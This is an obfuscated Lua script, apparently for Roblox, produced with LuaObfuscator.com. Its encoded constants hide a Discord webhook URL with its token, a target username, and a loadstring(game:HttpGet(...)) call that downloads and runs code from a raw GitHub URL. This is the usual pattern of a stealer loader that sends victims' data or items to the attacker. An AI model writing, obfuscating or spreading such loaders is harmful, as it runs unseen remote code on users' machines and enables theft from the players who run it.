--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v20)if (v1(v20,2)==79) then v19=v0(v3(v20,1,1));return "";else local v74=v2(v0(v20,16));if v19 then local v92=v5(v74,v19);v19=nil;return v92;else return v74;end end end);local function v21(v22,v23,v24)if v24 then local v75=0;local v76;while true do if (v75==(1811 -(1540 + 271))) then v76=(v22/(2^(v23-(1 + 0))))%((2 + (0 -0))^(((v24-(1 + (0 -0))) -(v23-(1 + 0))) + 1)) ;return v76-(v76%(1566 -(58 + 1507))) ;end end else local v77=(3 -(1135 -(363 + 771)))^(v23-(958 -(824 + 133))) ;return (((v22%(v77 + v77))>=v77) and (1 -(0 + 0))) or ((0 + 0) -0) ;end end local function v25()local v38=0 -(0 + 0) ;local v39;while true do if (v38==0) then v39=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v38=1896 -(431 + 1464) ;end if (v38==(329 -(93 + 235))) then return v39;end end end local function v26()local v40=0 + 0 ;local v41;local v42;while true do if (v40==(4 -3)) then return (v42 * 256) + v41 ;end if ((0 + 0)==v40) then v41,v42=v1(v16,v18,v18 + 2 );v18=v18 + (1043 -(501 + (1625 -1085))) ;v40=1 -0 ;end end end local function v27()local v43=(462 -(426 + 36)) + 0 ;local v44;local v45;local v46;local v47;while true do if (v43==(171 -(32 + 138))) then return (v47 * (26418406 -9641190)) + (v46 * 65536) + (v45 * (477 -221)) + v44 ;end if (v43==((184 -107) -(34 + 43))) then v44,v45,v46,v47=v1(v16,v18,v18 + (4 -1) );v18=v18 + ((78 -(67 + 4)) -3) ;v43=3 -2 ;end end end local function v28()local v48=v27();local v49=v27();local v50=1;local v51=(v21(v49,(2 -1) + 0 ,20) * ((2 + 0)^(13 + 19))) + v48 ;local v52=v21(v49,21,(1255 -(446 + 765)) -13 );local v53=((v21(v49,497 -(44 + 421) )==((1435 -(720 + 714)) + 0 + 0)) and  -(1 + 0 + 0)) or (1057 -(327 + 729)) ;if (v52==(0 -0)) then if (v51==(0 -0)) then return v53 * (235 -(224 + 11)) ;else local v93=0;while true do if (v93==0) then v52=1 -0 ;v50=0 + 0 ;break;end end end elseif (v52==(2986 -939)) then return ((v51==(1179 -((252 -96) + 1023))) and (v53 * ((1913 -(1623 + 289))/(0 -0)))) or (v53 * NaN) ;end return v8(v53,v52-(1272 -249) ) * (v50 + (v51/((1015 -(585 + 428))^52))) ;end local function v29(v30)local v54=0 + 0 ;local v55;local v56;while true do if (v54==(1189 -(105 + 1082))) then v56={};for v94=1 + 0 , #v55 do v56[v94]=v2(v1(v3(v55,v94,v94)));end v54=14 -11 ;end if (v54==(132 -(100 + 24 + 7))) then v55=v3(v16,v18,(v18 + v30) -(1 + (0 -0)) );v18=v18 + v30 ;v54=(3 -1) + 0 ;end if ((899 -(801 + 95))==v54) then return v6(v56);end if (v54==(0 -0)) then v55=nil;if  not v30 then v30=v27();if (v30==(0 -0)) then return "";end end v54=2 -1 ;end end end local v31=v27;local function v32(...)return {...},v12("#",...);end local function v33()local v57=0 -0 ;local v58;local v59;local v60;local v61;local v62;local v63;local v64;local v65;while true do if (v57~=(0 -0)) then else v58=1676 -(1153 + 523) ;v59=nil;v57=2 -1 ;end if ((3 -0)==v57) then v64=nil;v65=nil;v57=4;end if (v57==(2 + 0)) then v62=nil;v63=nil;v57=5 -2 ;end if (v57~=(8 -4)) then else while true do if (v58==(5 -2)) then v65=nil;while true do local v104=963 -(752 + 211) ;local v105;while true do if (v104==(0 + 0)) then v105=0 -0 ;while true do if (v105==(0 -0)) then local v125=0 + 0 ;while true do if (v125~=(0 + 0)) then else local v134=1033 -(14 + 1019) ;while true do if ((173 -(74 + 99))==v134) then if (v59~=(377 -(170 + 205))) then else local v146=0 + 0 ;local v147;local v148;while true do if (v146==(948 -(194 + 753))) then while true do if (v147==0) then v148=0;while true do if ((0 -0)==v148) then local v159=0 + 0 ;while true do if (v159==(1919 -(1708 + 211))) then local v164=0;while true do if (v164==(1069 -(378 + 690))) then v159=1 + 0 ;break;end if (v164==(1369 -(988 + 381))) then for v169=1594 -(1387 + 206) ,v64 do local v170=968 -(606 + 362) ;local v171;local v172;local v173;local v174;while true do if ((1 + 0)~=v170) then else v173=nil;v174=nil;v170=1257 -(770 + 485) ;end if (v170~=(2 + 0)) then else while true do if (v171==1) then v174=nil;while true do if (v172==(0 + 0)) then local v191=0 -0 ;local v192;local v193;while true do if (v191==1) then while true do if (v192==(1301 -(370 + 931))) then v193=1826 -(1232 + 594) ;while true do if (v193==1) then v172=2 -1 ;break;end if (v193~=(594 -(7 + 587))) then else local v204=1122 -(245 + 877) ;while true do if (v204==(1 + 0)) then v193=2 -1 ;break;end if (v204==(0 -0)) then local v206=0;while true do if (v206==0) then v173=v25();v174=nil;v206=1 + 0 ;end if ((1688 -(1613 + 74))==v206) then v204=1 + 0 ;break;end end end end end end break;end end break;end if (v191~=0) then else v192=95 -(56 + 39) ;v193=nil;v191=1;end end end if (v172~=1) then else if (v173==1) then v174=v25()~=(0 + 0) ;elseif (v173==(1782 -(25 + 1755))) then v174=v28();elseif (v173==(9 -6)) then v174=v29();end v65[v169]=v174;break;end end break;end if ((0 + 0)~=v171) then else local v184=0 + 0 ;local v185;while true do if (v184~=(0 -0)) then else v185=0 + 0 ;while true do if (v185==(1 + 0)) then v171=1;break;end if (v185==(0 + 0)) then local v198=0;while true do if (v198==1) then v185=1490 -(462 + 1027) ;break;end if (v198~=0) then else v172=428 -(332 + 96) ;v173=nil;v198=2 -1 ;end end end end break;end end end end break;end if (v170~=(724 -(710 + 14))) then else v171=0 -0 ;v172=nil;v170=1 + 0 ;end end end v63[868 -(826 + 39) ]=v25();v164=1 + 0 ;end end end if ((1 + 0)==v159) then v148=897 -(630 + 266) ;break;end end end if (v148~=(1 + 0)) then else for v160=2 -1 ,v27() do local v161=1656 -(1433 + 223) ;local v162;local v163;while true do if (v161~=(892 -(638 + 253))) then else while true do if (v162~=0) then else v163=v25();if (v21(v163,2 -1 ,1220 -(88 + 1131) )~=(146 -(127 + 19))) then else local v175=0;local v176;local v177;local v178;local v179;while true do if (v175==2) then while true do if (v176==(1835 -(7 + 1826))) then local v186=0;while true do if (v186==(0 -0)) then local v197=45 -(12 + 33) ;while true do if (v197==(1 + 0)) then v186=1 + 0 ;break;end if (0==v197) then if (v21(v178,1,1 + 0 )==(3 -2)) then v179[287 -(118 + 167) ]=v65[v179[751 -(98 + 651) ]];end if (v21(v178,2 -0 ,1002 -(380 + 620) )~=(1 + 0)) then else v179[3]=v65[v179[1 + 2 ]];end v197=1;end end end if (v186==(1 + 0)) then v176=1266 -(1032 + 231) ;break;end end end if ((884 -(662 + 221))==v176) then local v187=0 -0 ;local v188;while true do if (v187==(0 + 0)) then v188=0 -0 ;while true do if (v188~=(1 + 0)) then else v176=232 -(116 + 114) ;break;end if (v188~=(0 -0)) then else local v199=0 -0 ;while true do if (1==v199) then v188=1;break;end if (v199~=(0 + 0)) then else v179={v26(),v26(),nil,nil};if (v177==(0 + 0)) then local v205=0;while true do if (v205==(1739 -(1502 + 237))) then v179[1734 -(1168 + 563) ]=v26();v179[3 + 1 ]=v26();break;end end elseif (v177==(1 -0)) then v179[3]=v27();elseif (v177==(2 + 0)) then v179[3]=v27() -(2^(14 + 2)) ;elseif (v177==3) then local v211=0 + 0 ;while true do if (v211==(417 -(338 + 79))) then v179[3]=v27() -(2^16) ;v179[8 -4 ]=v26();break;end end end v199=175 -(38 + 136) ;end end end end break;end end end if ((2 + 1)==v176) then if (v21(v178,13 -10 ,704 -(569 + 132) )~=(1 + 0)) then else v179[3 + 1 ]=v65[v179[4]];end v60[v160]=v179;break;end if (v176~=0) then else local v190=0;while true do if (1==v190) then v176=188 -(143 + 44) ;break;end if (v190==(0 + 0)) then v177=v21(v163,1 + 1 ,2 + 1 );v178=v21(v163,578 -(530 + 44) ,2 + 4 );v190=1 + 0 ;end end end end break;end if ((1 + 0)==v175) then v178=nil;v179=nil;v175=2 + 0 ;end if (v175==(0 -0)) then v176=0 + 0 ;v177=nil;v175=2 -1 ;end end end break;end end break;end if ((0 -0)~=v161) then else local v166=0 + 0 ;while true do if (v166==(0 + 0)) then v162=0;v163=nil;v166=1 -0 ;end if (v166==1) then v161=1 -0 ;break;end end end end end v59=1 + 2 ;break;end end break;end end break;end if ((0 + 0)==v146) then v147=1101 -(903 + 198) ;v148=nil;v146=1699 -(164 + 1534) ;end end end if (v59==3) then local v149=0 + 0 ;local v150;while true do if (v149~=0) then else v150=0 -0 ;while true do local v155=0 + 0 ;local v156;while true do if (v155==0) then v156=0;while true do if ((1639 -(497 + 1142))~=v156) then else if (v150~=(0 + 0)) then else local v165=0 + 0 ;while true do if (v165~=(0 + 0)) then else local v168=0;while true do if (v168~=1) then else v165=1 + 0 ;break;end if (v168~=0) then else for v180=1 + 0 ,v27() do v61[v180-(513 -(110 + 402)) ]=v33();end for v182=1 + 0 ,v27() do v62[v182]=v27();end v168=1052 -(982 + 69) ;end end end if (v165==(187 -(22 + 164))) then v150=1 + 0 ;break;end end end if (v150==(1 + 0)) then return v63;end break;end end break;end end end break;end end end v134=1 + 0 ;end if (v134~=(1 + 0)) then else v125=1;break;end end end if (v125==(3 -2)) then v105=1;break;end end end if (v105==(1026 -(813 + 212))) then if (v59==(1 -0)) then local v129=0 + 0 ;local v130;while true do if (v129==(0 + 0)) then v130=1134 -(176 + 958) ;while true do if (v130==(1137 -(182 + 954))) then v65={};v59=1 + 1 ;break;end if (v130==0) then v63={v60,v61,nil,v62};v64=v27();v130=4 -3 ;end end break;end end end if (v59==(0 + 0)) then local v131=69 -(61 + 8) ;local v132;local v133;while true do if (v131==1) then while true do if (v132==(0 -0)) then v133=0 + 0 ;while true do if (v133==(3 -2)) then v62={};v59=1 -0 ;break;end if ((0 -0)==v133) then local v154=1012 -(150 + 862) ;while true do if (v154==(1423 -(320 + 1102))) then v133=1 + 0 ;break;end if (v154==(1519 -(399 + 1120))) then v60={};v61={};v154=855 -(210 + 644) ;end end end end break;end end break;end if (v131==(0 + 0)) then v132=0 + 0 ;v133=nil;v131=641 -(542 + 98) ;end end end break;end end break;end end end break;end if (v58~=0) then else local v100=1525 -(1000 + 525) ;while true do if (v100~=(1 -0)) then else v58=1 -0 ;break;end if (v100~=(0 + 0)) then else v59=1947 -(390 + 1557) ;v60=nil;v100=1060 -(824 + 235) ;end end end if (v58~=(1864 -(1275 + 588))) then else local v101=0;while true do if (v101==1) then v58=2 + 0 ;break;end if (v101==0) then v61=nil;v62=nil;v101=1 -0 ;end end end if (v58==(2 + 0)) then local v102=1637 -(920 + 717) ;while true do if (v102==(65 -(64 + 1))) then v63=nil;v64=nil;v102=3 -2 ;end if (v102==1) then v58=4 -1 ;break;end end end end break;end if (v57==(1 + 0)) then v60=nil;v61=nil;v57=458 -(273 + 183) ;end end end local function v34(v35,v36,v37)local v66=v35[1];local v67=v35[2];local v68=v35[3];return function(...)local v69=1;local v70= -1;local v71={...};local v72=v12("#",...) -1 ;local function v73()local v78=v66;local v79=v67;local v80=v68;local v81=v32;local v82={};local v83={};local v84={};for v88=0,v72 do if ((v88>=v80) or (476>=((3149 + 1114) -(597 + 919)))) then v82[v88-v80 ]=v71[v88 + ((841 -(701 + 139)) -0) ];else v84[v88]=v71[v88 + 1 + 0 ];end end local v85=(v72-v80) + 1 ;local v86;local v87;while true do local v89=0 -0 ;while true do if (((4595 -(374 + 462))==(4519 -(516 + 244))) and (v89==(451 -(388 + 62)))) then if ((v87<=3) or ((2533 -(503 + 207))==((17750 -11486) -3375))) then if ((v87<=1) or ((3591 -1726)<(1309 -699))) then if ((v87>((0 -0) + 0)) or ((4533 -(7125 -4407))>=(2672 + 161))) then local v108=0 -0 ;local v109;local v110;local v111;local v112;local v113;while true do if ((464<=(13000 -(8010 + 451))) and (v108==1)) then v111=nil;v112=nil;v108=(1996 -(817 + 90)) -((464 -260) + 883) ;end if ((v108==(0 -0)) or ((11372 -6864)<(478 + 1654))) then v109=677 -(646 + 31) ;v110=nil;v108=1 + 0 ;end if ((v108==(2 -0)) or ((5773 -1853)<(4882 -(2480 -(226 + 800))))) then v113=nil;while true do if (((14518 -10787)<((3211 + 4193) -2892)) and (v109==(69 -(63 + 6)))) then local v135=0 + 0 ;while true do if ((v135==(0 -0)) or ((86 + 347)>(5405 -(196 + 925)))) then v110=v86[1021 -(499 + 520) ];v111,v112=v81(v84[v110](v13(v84,v110 + (1654 -(1107 + 546)) ,v86[970 -(253 + 714) ])));v135=1 -0 ;end if ((v135==1) or ((753 + 1691)>(17767 -14213))) then v109=1 + 0 ;break;end end end if ((v109==(3 -(830 -(184 + 644)))) or ((5979 -3571)<(72 + (4589 -2971)))) then local v136=0 -0 ;while true do if ((v136==(3 -2)) or ((306 + 2163)<1719)) then v109=2 -(0 + 0) ;break;end if (((4515 -2687)<=(3927 -1607)) and (v136==(1740 -((5590 -4336) + 486)))) then v70=(v112 + v110) -((2 -1) + 0) ;v113=0;v136=(1784 -(907 + 876)) + 0 + 0 ;end end end if ((v109==(5 -3)) or (((4322 -(84 + 2)) -2867)<1287)) then for v143=v110,v70 do local v144=0 + 0 + 0 ;local v145;while true do if ((v144==(1790 -(963 + (2573 -(46 + 1700))))) or (1738>=(4666 -(1185 + 51)))) then v145=724 -(468 + 256) ;while true do if (((656 + 1066)==(4966 -3244)) and (v145==((0 -0) -(1095 -(262 + 833))))) then v113=v113 + (1 -0) + 0 ;v84[v143]=v111[v113];break;end end break;end end end break;end end break;end end else v84[v86[1 + (1 -0) ]]=v37[v86[(1154 -(1145 + 6)) + 0 ]];end elseif ((v87==(2 + 0)) or (3295==(1112 -851))) then local v116=0;local v117;local v118;local v119;while true do if ((1980<(5078 -(308 + 266))) and (v116==(0 + 0))) then v117=0 -0 ;v118=nil;v116=1;end if (((2 -1)==v116) or ((252 + 497)>(5525 -(69 + 1060)))) then v119=nil;while true do if (((1908 -(1410 + (341 -233)))<(4069 + 825)) and (v117==(628 -(233 + 72 + 323)))) then local v137=0 + 0 ;while true do if ((v137==(0 -0)) or ((3394 -1600)<((677 + 2838) -2798))) then v118=v86[2];v119=v84[v86[2 + 1 ]];v137=66 -(58 + (849 -(106 + 736))) ;end if ((v137==(1 -0)) or ((664 + 1633 + 533)<(283 + 533))) then v117=(3 -1) -1 ;break;end end end if ((v117==(1 + (1652 -(664 + 988)))) or (3362<=(5127 -(1591 + 1191)))) then v84[v118 + (1 -0) ]=v119;v84[v118]=v119[v86[934 -((1987 -(778 + 1050)) + 771) ]];break;end end break;end end else do return;end end elseif (((1189 + 856 + 94)<(3613 + 359)) and (v87<=(10 -5))) then if ((v87>(1215 -(991 + 220))) or (99>(3703 + 208))) then local v120=0;local v121;local v122;while true do if ((v120==1) or ((728 -(260 + 27))>(5772 -(1150 + (1349 -890))))) then while true do if ((v121==(0 + 0)) or ((6476 -(1991 + 2))<=(3271 -(546 + 532)))) then v122=v86[1828 -(363 + (2263 -(663 + 137))) ];v84[v122]=v84[v122](v13(v84,v122 + (4 -3) ,v70));break;end end break;end if (((9938 -7710)>=99) and (v120==0)) then v121=0;v122=nil;v120=1;end end else v84[v86[2]]();end elseif (((434 + 3675)==(15619 -11510)) and (v87<=((256 + 1403) -((1686 -(860 + 375)) + (1865 -(449 + 214)))))) then v37[v86[8 -5 ]]=v84[v86[8 -(2 + 4) ]];elseif ((v87>(13 -6)) or ((99 + 1228)<=(482 + 623))) then v84[v86[2]]=v86[1 + 2 ]~=(0 -0) ;else v84[v86[2 -0 ]]=v86[(274 + 302) -((78 -36) + 531) ];end v69=v69 + ((1292 -642) -(299 + 196 + 154)) ;break;end if ((((1142 -(99 + 63)) -581)<=(1082 + 3146)) and (v89==(0 + 0))) then local v103=0 -0 ;while true do if (((540 -(522 + 18))==v103) or ((3837 + 213)<=(4215 -2949))) then v86=v78[v69];v87=v86[81 -(16 + 53 + 11) ];v103=1349 -(643 + 705) ;end if ((v103==(1971 -(778 + 1192))) or (((3706 -1945) -(206 + (469 -(237 + 123))))==(2661 + 469))) then v89=715 -(254 + 460) ;break;end end end end end end A,B=v32(v11(v73));if  not A[1] then local v90=0;local v91;while true do if (v90==0) then v91=v35[4][v69] or "?" ;error("Script error at ["   .. v91   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end end;end return v34(v33(),{},v17)(...);end v15("LOL!083O0003083O00557365724E616D6503133O0044696769746F506C61797A546869736630393503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31303933383036372O313938343335372O34372F454335304A6C324471654B72716E414F6D7934664E6F67464E554F6D64414B35766F5141734E5363785953714A334F3457534E424A756430686D4563692D2O5A73596F63030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403323O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F507378302F412F6D61696E2F6D61696E000D3O0012073O00023O0012063O00013O0012073O00043O0012063O00033O00124O00053O00122O000100063O002002000100010007001207000300084O0008000400014O0001000100044O00055O00022O00043O000100012O00033O00017O000D3O00023O00023O00033O00033O00043O00043O00043O00043O00043O00043O00043O00043O00053O00",v9(),...);end